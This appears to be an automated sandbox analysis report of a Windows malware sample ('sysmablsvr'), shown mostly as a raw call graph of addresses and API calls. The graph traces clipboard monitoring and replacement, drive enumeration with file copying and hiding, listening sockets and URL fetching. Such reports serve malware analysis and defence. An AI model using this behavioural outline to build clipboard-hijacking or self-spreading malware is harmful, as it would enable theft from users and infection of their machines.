5450 4012cc 5447->5450 5451 40130a 5448->5451 5448->5452 5449 40a740 _invalid_parameter 3 API calls 5453 4012fc 5449->5453 5454 40a740 _invalid_parameter 3 API calls 5450->5454 5455 40a740 _invalid_parameter 3 API calls 5451->5455 5452->5449 5453->5436 5457 4012db 5454->5457 5455->5456 5456->5436 5457->5436 5459 40d231 send 5458->5459 5460 40d1d3 5459->5460 5461 40d24e 5459->5461 5460->5440 5460->5441 5461->5459 5461->5460 5463 40c051 lstrlenA 5462->5463 5464 40c720 7 API calls 5463->5464 5468 40c06f 5464->5468 5465 40c07b 5466 40c0ff 5465->5466 5467 40a740 _invalid_parameter 3 API calls 5465->5467 5466->5419 5467->5466 5468->5463 5468->5465 5471 40b7f8 5469->5471 5470 40b834 LeaveCriticalSection 5470->5419 5471->5470 5494 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5471->5494 5473 40b823 5473->5470 5495 406e60 5474->5495 5477 406e59 5477->5419 5478 40d6f0 340 API calls 5478->5477 5480 406e60 75 API calls 5479->5480 5481 406edf 5480->5481 5483 406f0c 5481->5483 5510 406f20 5481->5510 5483->5419 5513 405f40 EnterCriticalSection 5484->5513 5486 406d0a 5490 406d3d 5486->5490 5518 406d50 5486->5518 5489 40a740 _invalid_parameter 3 API calls 5489->5490 5490->5419 5525 406000 EnterCriticalSection 5491->5525 5493 406e12 5493->5419 5494->5473 5496 406e73 5495->5496 5497 406e34 5496->5497 5499 405e50 EnterCriticalSection 5496->5499 5497->5477 5497->5478 5500 40cdb0 71 API calls 5499->5500 5501 405e6e 5500->5501 5502 405f2b LeaveCriticalSection 5501->5502 5503 405e87 5501->5503 5505 405ea8 5501->5505 5502->5496 5504 405e91 memcpy 5503->5504 5509 405ea6 5503->5509 5504->5509 5508 405f06 memcpy 5505->5508 5505->5509 5506 40a740 _invalid_parameter 3 API calls 5507 405f28 5506->5507 5507->5502 5508->5509 5509->5506 5511 40ba10 18 API calls 5510->5511 5512 406f65 5511->5512 5512->5483 5514 405f5e 5513->5514 5515 405fea LeaveCriticalSection 5514->5515 5516 40a7b0 8 API calls 5514->5516 5515->5486 5517 405fbc 5516->5517 5517->5515 5519 40a530 __aligned_recalloc_base 7 API calls 5518->5519 5520 406d62 memcpy 5519->5520 5521 40ba10 18 API calls 5520->5521 5522 406dcc 5521->5522 5523 40a740 _invalid_parameter 3 API calls 5522->5523 5524 406d31 5523->5524 5524->5489 5550 40ce10 5525->5550 5528 406243 LeaveCriticalSection 5528->5493 5529 40cdb0 71 API calls 5530 406039 5529->5530 5530->5528 5531 406094 memcpy 5530->5531 5549 406158 5530->5549 5534 40a740 _invalid_parameter 3 API calls 5531->5534 5532 406181 5535 40a740 _invalid_parameter 3 API calls 5532->5535 5533 405c90 75 API calls 5533->5532 5536 4060b8 5534->5536 5537 4061a2 5535->5537 5538 40a7b0 8 API calls 5536->5538 5537->5528 5539 4061b1 CreateFileW 5537->5539 5540 4060c8 5538->5540 5539->5528 5546 4061d4 5539->5546 5541 40a740 _invalid_parameter 3 API calls 5540->5541 5542 4060ef 5541->5542 5545 40c720 7 API calls 5542->5545 5543 4061f1 WriteFile 5543->5546 5544 40622f FlushFileBuffers CloseHandle 5544->5528 5547 406125 5545->5547 5546->5543 5546->5544 5548 4072a0 71 API calls 5547->5548 5548->5549 5549->5532 5549->5533 5553 40c360 5550->5553 5555 40c371 5553->5555 5554 40a7b0 8 API calls 5554->5555 5555->5554 5556 40c2c0 70 API calls 5555->5556 5559 408080 68 API calls 5555->5559 5560 40c38b 5555->5560 5561 40c3cb memcmp 5555->5561 5556->5555 5557 40a740 _invalid_parameter 3 API calls 5558 406022 5557->5558 5558->5528 5558->5529 5559->5555 5560->5557 5561->5555 5561->5560 5563 401ef2 InterlockedDecrement setsockopt closesocket 5562->5563 5564 401d74 5562->5564 5581 401e39 5563->5581 5564->5563 5565 401d7c 5564->5565 5582 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5565->5582 5567 401d81 InterlockedExchange 5568 401d98 5567->5568 5569 401e4e 5567->5569 5574 401da9 InterlockedDecrement 5568->5574 5575 401dbc InterlockedDecrement InterlockedExchangeAdd 5568->5575 5568->5581 5570 401e67 5569->5570 5571 401e57 InterlockedDecrement 5569->5571 5572 401e72 5570->5572 5573 401e87 InterlockedDecrement 5570->5573 5571->5318 5591 401ae0 WSASend 5572->5591 5579 401ee9 5573->5579 5574->5318 5577 401e2f 5575->5577 5583 401cf0 5577->5583 5578 401e7e 5578->5318 5579->5318 5581->5318 5582->5567 5584 401d00 InterlockedExchangeAdd 5583->5584 5585 401cfc 5583->5585 5586 401d53 5584->5586 5587 401d17 InterlockedIncrement 5584->5587 5585->5581 5586->5581 5597 401c50 WSARecv 5587->5597 5589 401d46 5589->5586 5590 401d4c InterlockedDecrement 5589->5590 5590->5586 5592 401b50 5591->5592 5593 401b12 WSAGetLastError 5591->5593 5592->5578 5593->5592 5594 401b1f 5593->5594 5595 401b56 5594->5595 5596 401b26 Sleep WSASend 5594->5596 5595->5578 5596->5592 5596->5593 5598 401cd2 5597->5598 5599 401c8e 5597->5599 5598->5589 5600 401c90 WSAGetLastError 5599->5600 5601 401ca4 Sleep WSARecv 5599->5601 5602 401cdb 5599->5602 5600->5598 5600->5599 5601->5598 5601->5600 5602->5589 5604 40a320 7 API calls 5603->5604 5605 4013bb CreateEventA socket 5604->5605 5606 4013f2 5605->5606 5607 4013fd 5605->5607 5608 401330 8 API calls 5606->5608 5609 401401 bind 5607->5609 5610 401462 5607->5610 5611 4013f8 5608->5611 5612 401444 CreateThread 5609->5612 5613 401434 5609->5613 5610->5324 5611->5607 5612->5610 5626 401100 5612->5626 5614 401330 8 API calls 5613->5614 5615 40143a 5614->5615 5615->5324 5617 401339 5616->5617 5625 40139b 5616->5625 5618 401341 SetEvent WaitForSingleObject CloseHandle 5617->5618 5617->5625 5619 40138b 5618->5619 5624 401369 5618->5624 5655 40b0d0 shutdown closesocket 5619->5655 5621 401395 5623 40a740 _invalid_parameter 3 API calls 5621->5623 5622 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5622->5624 5623->5625 5624->5619 5624->5622 5625->5322 5627 401115 ioctlsocket 5626->5627 5628 4011e4 5627->5628 5630 40113a 5627->5630 5629 40a740 _invalid_parameter 3 API calls 5628->5629 5632 4011ea 5629->5632 5631 4011cd WaitForSingleObject 5630->5631 5633 40a570 9 API calls 5630->5633 5634 401168 recvfrom 5630->5634 5635 4011ad InterlockedExchangeAdd 5630->5635 5631->5627 5631->5628 5633->5630 5634->5630 5634->5631 5637 401000 5635->5637 5638 401014 5637->5638 5639 40a320 7 API calls 5638->5639 5641 40103b 5638->5641 5639->5641 5648 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5641->5648 5642 40105b 5649 401580 5642->5649 5644 4010ec 5644->5630 5645 4010a3 IsBadReadPtr 5646 401071 5645->5646 5646->5644 5646->5645 5647 4010d8 memmove 5646->5647 5647->5646 5648->5642 5650 401592 5649->5650 5651 4015a5 memcpy 5649->5651 5652 40a570 9 API calls 5650->5652 5653 4015c1 5651->5653 5654 40159f 5652->5654 5653->5646 5654->5651 5655->5621 5657 401483 5656->5657 5658 401572 5656->5658 5657->5658 5659 40a320 7 API calls 5657->5659 5658->5333 5660 401498 CreateEventA socket 5659->5660 5661 4014da 5660->5661 5662 4014cf 5660->5662 5661->5658 5664 4014e2 htons setsockopt bind 5661->5664 5663 401330 8 API calls 5662->5663 5667 4014d5 5663->5667 5665 401546 5664->5665 5666 401558 CreateThread 5664->5666 5668 401330 8 API calls 5665->5668 5666->5658 5670 401100 20 API calls _invalid_parameter 5666->5670 5667->5661 5669 40154c 5668->5669 5669->5333 5672 4021cf 5671->5672 5673 4021bb 5671->5673 5672->5341 5672->5342 5673->5672 5696 402020 5673->5696 5676 40160d 5675->5676 5695 401737 5675->5695 5677 401619 EnterCriticalSection 5676->5677 5676->5695 5678 4016b5 LeaveCriticalSection SetEvent 5677->5678 5681 401630 5677->5681 5679 4016d0 5678->5679 5680 4016e8 5678->5680 5683 4016d6 PostQueuedCompletionStatus 5679->5683 5684 40d860 11 API calls 5680->5684 5681->5678 5682 401641 InterlockedDecrement 5681->5682 5686 40165a InterlockedExchangeAdd 5681->5686 5693 4016a0 InterlockedDecrement 5681->5693 5682->5681 5683->5680 5683->5683 5685 4016f3 5684->5685 5687 40d9a0 7 API calls 5685->5687 5686->5681 5688 40166d InterlockedIncrement 5686->5688 5689 4016fc CloseHandle CloseHandle WSACloseEvent 5687->5689 5690 401c50 4 API calls 5688->5690 5718 40b0d0 shutdown closesocket 5689->5718 5690->5681 5692 401724 DeleteCriticalSection 5694 40a740 _invalid_parameter 3 API calls 5692->5694 5693->5681 5694->5695 5695->5341 5697 40a320 7 API calls 5696->5697 5698 40202b 5697->5698 5699 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5698->5699 5700 4021aa 5698->5700 5701 402076 CreateIoCompletionPort 5699->5701 5702 40219f 5699->5702 5700->5672 5701->5702 5703 40208f 5701->5703 5704 401600 36 API calls 5702->5704 5705 40d6c0 8 API calls 5703->5705 5706 4021a5 5704->5706 5707 402094 5705->5707 5706->5700 5707->5702 5708 40209f WSASocketA 5707->5708 5708->5702 5709 4020bd setsockopt htons bind 5708->5709 5709->5702 5710 402126 listen 5709->5710 5710->5702 5711 40213a WSACreateEvent 5710->5711 5711->5702 5712 402147 WSAEventSelect 5711->5712 5712->5702 5713 402159 5712->5713 5714 40217f 5713->5714 5715 40d6f0 329 API calls 5713->5715 5716 40d6f0 329 API calls 5714->5716 5715->5713 5717 402194 5716->5717 5717->5672 5718->5692 5720 4022d2 EnterCriticalSection 5719->5720 5721 4022cd 5719->5721 5722 4022fd LeaveCriticalSection 5720->5722 5725 4022e7 5720->5725 5721->5364 5723 402308 5722->5723 5724 40230f 5722->5724 5723->5364 5726 40a320 7 API calls 5724->5726 5725->5722 5727 402319 5726->5727 5728 402326 getpeername CreateIoCompletionPort 5727->5728 5729 4023b8 5727->5729 5730 4023b2 5728->5730 5731 402366 5728->5731 5761 40b0d0 shutdown closesocket 5729->5761 5734 40a740 _invalid_parameter 3 API calls 5730->5734 5759 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5731->5759 5734->5729 5735 4023c3 5735->5364 5736 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5760 4021e0 EnterCriticalSection LeaveCriticalSection 5736->5760 5738 4023ab 5738->5364 5740 40190f 5739->5740 5741 401830 5739->5741 5740->5355 5741->5740 5742 40183d InterlockedExchangeAdd 5741->5742 5742->5740 5748 401854 5742->5748 5743 401880 5744 401891 5743->5744 5771 40b0d0 shutdown closesocket 5743->5771 5747 4018a7 InterlockedDecrement 5744->5747 5749 401901 5744->5749 5747->5749 5748->5740 5748->5743 5762 4017a0 EnterCriticalSection 5748->5762 5750 402247 5749->5750 5751 402265 EnterCriticalSection 5749->5751 5750->5355 5752 40229c LeaveCriticalSection DeleteCriticalSection 5751->5752 5755 40227d 5751->5755 5753 40a740 _invalid_parameter 3 API calls 5752->5753 5753->5750 5754 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5754->5755 5755->5754 5756 40229b 5755->5756 5756->5752 5757->5363 5758->5363 5759->5736 5760->5738 5761->5735 5763 401807 LeaveCriticalSection 5762->5763 5764 4017ba InterlockedExchangeAdd 5762->5764 5763->5748 5765 4017ca LeaveCriticalSection 5764->5765 5766 4017d9 5764->5766 5765->5748 5767 40a740 _invalid_parameter 3 API calls 5766->5767 5768 4017fe 5767->5768 5769 40a740 _invalid_parameter 3 API calls 5768->5769 5770 401804 5769->5770 5770->5763 5771->5744 5773 407407 5772->5773 5774 4074e1 Sleep 5773->5774 5775 40742f Sleep 5773->5775 5776 40745e Sleep wsprintfA DeleteUrlCacheEntry 5773->5776 5778 40f070 64 API calls 5773->5778 5774->5773 5775->5773 5803 40efc0 InternetOpenA 5776->5803 5778->5773 5780 405829 memset GetModuleHandleW 5779->5780 5781 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5780->5781 5781->5781 5782 4058a0 CreateWindowExW 5781->5782 5783 4058cb 5782->5783 5784 4058cd GetMessageA 5782->5784 5785 4058ff ExitThread 5783->5785 5786 4058e1 TranslateMessage DispatchMessageA 5784->5786 5787 4058f7 5784->5787 5786->5784 5787->5780 5787->5785 5810 40ed00 CreateFileW 5788->5810 5790 406cd8 ExitThread 5792 406b80 5792->5790 5793 406cc8 Sleep 5792->5793 5794 406bb9 5792->5794 5813 406340 GetLogicalDrives 5792->5813 5793->5792 5819 406260 5794->5819 5797 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5799 406c66 wsprintfW 5797->5799 5800 406c7b wsprintfW 5797->5800 5798 406beb 5799->5800 5825 406650 _chkstk 5800->5825 5804 40efe6 InternetOpenUrlA 5803->5804 5805 40f058 Sleep 5803->5805 5806 40f005 HttpQueryInfoA 5804->5806 5807 40f04e InternetCloseHandle 5804->5807 5805->5773 5808 40f044 InternetCloseHandle 5806->5808 5809 40f02e 5806->5809 5807->5805 5808->5807 5809->5808 5811 40ed48 5810->5811 5812 40ed2f GetFileSize CloseHandle 5810->5812 5811->5792 5812->5811 5818 40636d 5813->5818 5814 4063e6 5814->5792 5815 40637c RegOpenKeyExW 5816 40639e RegQueryValueExW 5815->5816 5815->5818 5817 4063da RegCloseKey 5816->5817 5816->5818 5817->5818 5818->5814 5818->5815 5818->5817 5820 4062b9 5819->5820 5821 40627c 5819->5821 5820->5797 5820->5798 5860 4062c0 GetDriveTypeW 5821->5860 5824 4062ab lstrcpyW 5824->5820 5826 40666e 6 API calls 5825->5826 5827 406667 5825->5827 5828 406722 5826->5828 5829 406764 PathFileExistsW 5826->5829 5827->5798 5830 40ed00 3 API calls 5828->5830 5831 406803 PathFileExistsW 5829->5831 5832 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5829->5832 5835 40672e 5830->5835 5833 406814 5831->5833 5834 406859 FindFirstFileW 5831->5834 5836 4067a9 CreateDirectoryW 5832->5836 5837 4067cb PathFileExistsW 5832->5837 5838 406834 5833->5838 5839 40681c 5833->5839 5834->5827 5858 406880 5834->5858 5835->5829 5840 406745 SetFileAttributesW DeleteFileW 5835->5840 5836->5837 5841 4067bc SetFileAttributesW 5836->5841 5837->5831 5842 4067dc CopyFileW 5837->5842 5845 406400 3 API calls 5838->5845 5865 406400 CoInitialize CoCreateInstance 5839->5865 5840->5829 5841->5837 5842->5831 5843 4067f4 SetFileAttributesW 5842->5843 5843->5831 5847 40682f SetFileAttributesW 5845->5847 5846 406942 lstrcmpW 5848 406958 lstrcmpW 5846->5848 5846->5858 5847->5834 5848->5858 5850 406b19 FindNextFileW 5850->5846 5851 406b35 FindClose 5850->5851 5851->5827 5852 40699e lstrcmpiW 5852->5858 5853 406a05 PathMatchSpecW 5854 406a26 wsprintfW SetFileAttributesW DeleteFileW 5853->5854 5853->5858 5854->5858 5855 406a83 PathFileExistsW 5856 406a99 wsprintfW wsprintfW 5855->5856 5855->5858 5857 406b03 MoveFileExW 5856->5857 5856->5858 5857->5850 5858->5846 5858->5850 5858->5852 5858->5853 5858->5855 5869 406510 CreateDirectoryW wsprintfW FindFirstFileW 5858->5869 5861 40629f 5860->5861 5862 4062e8 5860->5862 5861->5820 5861->5824 5862->5861 5863 4062fc QueryDosDeviceW 5862->5863 5863->5861 5864 406316 StrCmpNW 5863->5864 5864->5861 5866 406436 5865->5866 5868 406472 5865->5868 5867 406440 wsprintfW 5866->5867 5866->5868 5867->5868 5868->5847 5870 406565 lstrcmpW 5869->5870 5871 40663f 5869->5871 5872 40657b lstrcmpW 5870->5872 5876 406591 5870->5876 5871->5858 5873 406593 wsprintfW wsprintfW 5872->5873 5872->5876 5875 4065f6 MoveFileExW 5873->5875 5873->5876 5874 40660c FindNextFileW 5874->5870 5877 406628 FindClose RemoveDirectoryW 5874->5877 5875->5874 5876->5874 5877->5871 6013 40da60 6014 40bb00 340 API calls 6013->6014 6015 40da98 6014->6015 6016 40d660 6021 401b60 6016->6021 6018 40d675 6019 40d694 6018->6019 6020 401b60 16 API calls 6018->6020 6020->6019 6022 401c42 6021->6022 6023 401b70 6021->6023 6022->6018 6023->6022 6024 40a320 7 API calls 6023->6024 6025 401b9d 6024->6025 6025->6022 6026 40a7b0 8 API calls 6025->6026 6027 401bc9 6026->6027 6028 401be6 6027->6028 6029 401bd6 6027->6029 6031 401ae0 4 API calls 6028->6031 6030 40a740 _invalid_parameter 3 API calls 6029->6030 6032 401bdc 6030->6032 6033 401bf3 6031->6033 6032->6018 6034 401c33 6033->6034 6035 401bfc EnterCriticalSection 6033->6035 6036 40a740 _invalid_parameter 3 API calls 6034->6036 6037 401c13 6035->6037 6038 401c1f LeaveCriticalSection 6035->6038 6039 401c3c 6036->6039 6037->6038 6038->6018 6040 40a740 _invalid_parameter 3 API calls 6039->6040 6040->6022 6041 40d020 6046 40b2d0 6041->6046 6044 40d04a 6045 40d060 340 API calls 6045->6044 6047 40b360 2 API calls 6046->6047 6048 40b2df 6047->6048 6049 40b2e9 6048->6049 6050 40b2ed EnterCriticalSection 6048->6050 6049->6044 6049->6045 6051 40b30c LeaveCriticalSection 6050->6051 6051->6049 6053 40d4e0 6054 40d4f6 6053->6054 6071 40d54e 6053->6071 6055 40d500 6054->6055 6056 40d553 6054->6056 6057 40d5a3 6054->6057 6054->6071 6060 40a320 7 API calls 6055->6060 6058 40d578 6056->6058 6059 40d56b InterlockedDecrement 6056->6059 6080 40c150 6057->6080 6062 40a740 _invalid_parameter 3 API calls 6058->6062 6059->6058 6063 40d50d 6060->6063 6064 40d584 6062->6064 6076 4023d0 6063->6076 6066 40a740 _invalid_parameter 3 API calls 6064->6066 6066->6071 6068 40b2d0 4 API calls 6069 40d52f 6068->6069 6070 40d53b InterlockedIncrement 6069->6070 6069->6071 6070->6071 6073 40d601 IsBadReadPtr 6074 40d5c9 6073->6074 6074->6071 6074->6073 6075 40bb00 340 API calls 6074->6075 6085 40c250 6074->6085 6075->6074 6077 402413 6076->6077 6078 4023d9 6076->6078 6077->6068 6078->6077 6079 4023ea InterlockedIncrement 6078->6079 6079->6077 6081 40c163 6080->6081 6082 40c18d memcpy 6080->6082 6083 40a570 9 API calls 6081->6083 6082->6074 6084 40c184 6083->6084 6084->6082 6086 40c279 6085->6086 6087 40c26e 6085->6087 6086->6087 6088 40c291 memmove 6086->6088 6087->6074 6088->6087 6089 405fe5 6091 405f5e 6089->6091 6090 405fea LeaveCriticalSection 6091->6090 6092 40a7b0 8 API calls 6091->6092 6093 405fbc 6092->6093 6093->6090 6094 406ba6 6102 406b88 6094->6102 6095 406cc8 Sleep 6095->6102 6096 406bb9 6097 406260 4 API calls 6096->6097 6098 406bca 6097->6098 6101 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6098->6101 6103 406beb 6098->6103 6099 406cd8 ExitThread 6100 406340 4 API calls 6100->6102 6104 406c66 wsprintfW 6101->6104 6105 406c7b wsprintfW 6101->6105 6102->6095 6102->6096 6102->6099 6102->6100 6104->6105 6106 406650 51 API calls 6105->6106 6106->6103 5970 4069c8 5980 40696e 5970->5980 5971 40699e lstrcmpiW 5971->5980 5972 406b19 FindNextFileW 5973 406942 lstrcmpW 5972->5973 5974 406b35 FindClose 5972->5974 5978 406958 lstrcmpW 5973->5978 5973->5980 5976 406b42 5974->5976 5975 406a05 PathMatchSpecW 5977 406a26 wsprintfW SetFileAttributesW DeleteFileW 5975->5977 5975->5980 5977->5980 5978->5980 5979 406a83 PathFileExistsW 5979->5980 5981 406a99 wsprintfW wsprintfW 5979->5981 5980->5971 5980->5972 5980->5975 5980->5979 5983 406510 11 API calls 5980->5983 5981->5980 5982 406b03 MoveFileExW 5981->5982 5982->5972 5983->5980 6107 40f42c 6108 40f434 6107->6108 6110 40f4e8 6108->6110 6113 40f669 6108->6113 6112 40f46d 6112->6110 6117 40f554 RtlUnwind 6112->6117 6114 40f67e 6113->6114 6116 40f69a 6113->6116 6115 40f709 NtQueryVirtualMemory 6114->6115 6114->6116 6115->6116 6116->6112 6118 40f56c 6117->6118 6118->6112 5878 405910 GetWindowLongW 5879 405934 5878->5879 5880 405956 5878->5880 5881 405941 5879->5881 5882 4059c7 IsClipboardFormatAvailable 5879->5882 5883 405951 5880->5883 5884 4059a6 5880->5884 5885 40598e SetWindowLongW 5880->5885 5888 405964 SetClipboardViewer SetWindowLongW 5881->5888 5889 405947 5881->5889 5886 4059e3 IsClipboardFormatAvailable 5882->5886 5887 4059da 5882->5887 5890 405b44 DefWindowProcA 5883->5890 5884->5883 5891 4059ac SendMessageA 5884->5891 5885->5883 5886->5887 5892 4059f8 IsClipboardFormatAvailable 5886->5892 5894 405a15 OpenClipboard 5887->5894 5895 405adf 5887->5895 5888->5890 5889->5883 5893 405afd RegisterRawInputDevices ChangeClipboardChain 5889->5893 5891->5883 5892->5887 5893->5890 5894->5895 5897 405a25 GetClipboardData 5894->5897 5895->5883 5896 405ae5 SendMessageA 5895->5896 5896->5883 5897->5883 5898 405a3d GlobalLock 5897->5898 5898->5883 5899 405a55 5898->5899 5900 405a68 5899->5900 5901 405a89 5899->5901 5902 405a9e 5900->5902 5903 405a6e 5900->5903 5904 405630 13 API calls 5901->5904 5920 405750 5902->5920 5905 405a74 GlobalUnlock CloseClipboard 5903->5905 5914 405510 5903->5914 5904->5905 5905->5895 5909 405ac7 5905->5909 5928 4048a0 lstrlenW 5909->5928 5912 40a740 _invalid_parameter 3 API calls 5913 405adc 5912->5913 5913->5895 5915 40551b 5914->5915 5916 405521 lstrlenW 5915->5916 5917 40a530 __aligned_recalloc_base 7 API calls 5915->5917 5918 405551 lstrcpynW 5915->5918 5919 405534 5915->5919 5916->5915 5916->5919 5917->5915 5918->5915 5918->5919 5919->5905 5924 40575d 5920->5924 5921 405763 lstrlenA 5922 405776 5921->5922 5921->5924 5922->5905 5923 4055d0 2 API calls 5923->5924 5924->5921 5924->5922 5924->5923 5925 40a530 __aligned_recalloc_base 7 API calls 5924->5925 5927 40a740 _invalid_parameter 3 API calls 5924->5927 5965 405700 5924->5965 5925->5924 5927->5924 5931 4048d4 5928->5931 5929 404d5e StrStrW 5932 404d71 5929->5932 5933 404d75 StrStrW 5929->5933 5930 404ae2 5930->5912 5931->5930 5939 404c69 StrStrW 5931->5939 5942 404af4 5931->5942 5932->5933 5934 404d88 5933->5934 5935 404d8c StrStrW 5933->5935 5934->5935 5936 404d9f 5935->5936 5936->5930 5937 404e09 isalpha 5936->5937 5945 404e43 5936->5945 5937->5936 5938 404e20 isdigit 5937->5938 5938->5930 5938->5936 5940 404c94 StrStrW 5939->5940 5939->5942 5941 404cbf StrStrW 5940->5941 5940->5942 5941->5942 5942->5929 5942->5930 5943 405351 StrStrW 5948 405364 5943->5948 5949 40536b StrStrW 5943->5949 5944 405303 StrStrW 5946 405316 5944->5946 5947 40531d StrStrW 5944->5947 5945->5943 5945->5944 5946->5947 5950 405330 5947->5950 5951 405337 StrStrW 5947->5951 5948->5949 5952 405385 StrStrW 5949->5952 5953 40537e 5949->5953 5950->5951 5951->5943 5956 40534a 5951->5956 5954 405398 5952->5954 5955 40539f StrStrW 5952->5955 5953->5952 5954->5955 5957 4053b2 5955->5957 5958 4053b9 StrStrW 5955->5958 5956->5943 5957->5958 5959 4053cc lstrlenA 5958->5959 5959->5930 5961 405492 GlobalAlloc 5959->5961 5961->5930 5962 4054ad GlobalLock 5961->5962 5962->5930 5963 4054c0 memcpy GlobalUnlock OpenClipboard 5962->5963 5963->5930 5964 4054ed EmptyClipboard SetClipboardData CloseClipboard 5963->5964 5964->5930 5966 40570b 5965->5966 5967 405711 lstrlenA 5966->5967 5968 4055d0 2 API calls 5966->5968 5969 405744 5966->5969 5967->5966 5968->5966 5969->5924 6133 4074f1 ExitThread 6134 40e6b1 6136 40e6ba 6134->6136 6135 40e7ad 6136->6135 6137 40e723 lstrcmpiW 6136->6137 6138 40e7a3 SysFreeString 6137->6138 6139 40e736 6137->6139 6138->6135 6140 40e4a0 2 API calls 6139->6140 6142 40e744 6140->6142 6141 40e795 6141->6138 6142->6138 6142->6141 6143 40e773 lstrcmpiW 6142->6143 6144 40e785 6143->6144 6145 40e78b SysFreeString 6143->6145 6144->6145 6145->6141 6146 40f434 6147 40f452 6146->6147 6148 40f4e8 6146->6148 6149 40f669 NtQueryVirtualMemory 6147->6149 6151 40f46d 6149->6151 6150 40f554 RtlUnwind 6150->6151 6151->6148 6151->6150 5996 4080d9 5997 4080e2 5996->5997 5998 4080f1 34 API calls 5997->5998 5999 408f26 5997->5999 6000 405f1d 6002 405eb1 6000->6002 6001 405f1b 6003 40a740 _invalid_parameter 3 API calls 6001->6003 6002->6001 6005 405f06 memcpy 6002->6005 6004 405f28 LeaveCriticalSection 6003->6004 6005->6001 6007 40a81e 6008 40a740 _invalid_parameter 3 API calls 6007->6008 6009 40a7dd 6008->6009 6010 40a7f2 6009->6010 6011 40a530 __aligned_recalloc_base 7 API calls 6009->6011 6012 40a7f4 memcpy 6009->6012 6011->6009 6012->6009

                                              Executed Functions

                                              Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 297 402020-402032 call 40a320 300 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 297->300 301 4021aa-4021ae 297->301 302 402076-402089 CreateIoCompletionPort 300->302 303 40219f-4021a8 call 401600 300->303 302->303 304 40208f-402099 call 40d6c0 302->304 303->301 304->303 309 40209f-4020b7 WSASocketA 304->309 309->303 310 4020bd-402120 setsockopt htons bind 309->310 310->303 311 402126-402138 listen 310->311 311->303 312 40213a-402145 WSACreateEvent 311->312 312->303 313 402147-402157 WSAEventSelect 312->313 313->303 314 402159-40215f 313->314 315 402161-402171 call 40d6f0 314->315 316 40217f-40218f call 40d6f0 314->316 319 402176-40217d 315->319 320 402194-40219e 316->320 319->315 319->316
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                • Part of subcall function 0040D6C0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D6DE
                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                              • setsockopt.WS2_32 ref: 004020D1
                                              • htons.WS2_32(?), ref: 00402101
                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                • Part of subcall function 0040D6F0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D6F0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                                • Part of subcall function 0040D6F0: DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                                • Part of subcall function 0040D6F0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                              • String ID:
                                              • API String ID: 1603358586-0
                                              • Opcode ID: 72ab33da5a46cba579dbb6cb68541ccf7241d57183c7f57f2b237d70ef746978
                                              • Instruction ID: 5f4ab44496f95361e3b7ac477a06260d9546e6561ad256066a099106afd7ac33
                                              • Opcode Fuzzy Hash: 72ab33da5a46cba579dbb6cb68541ccf7241d57183c7f57f2b237d70ef746978
                                              • Instruction Fuzzy Hash: 2B41C070640701BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA2D4E7F4E445875A
                                              Function 0040DCA0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
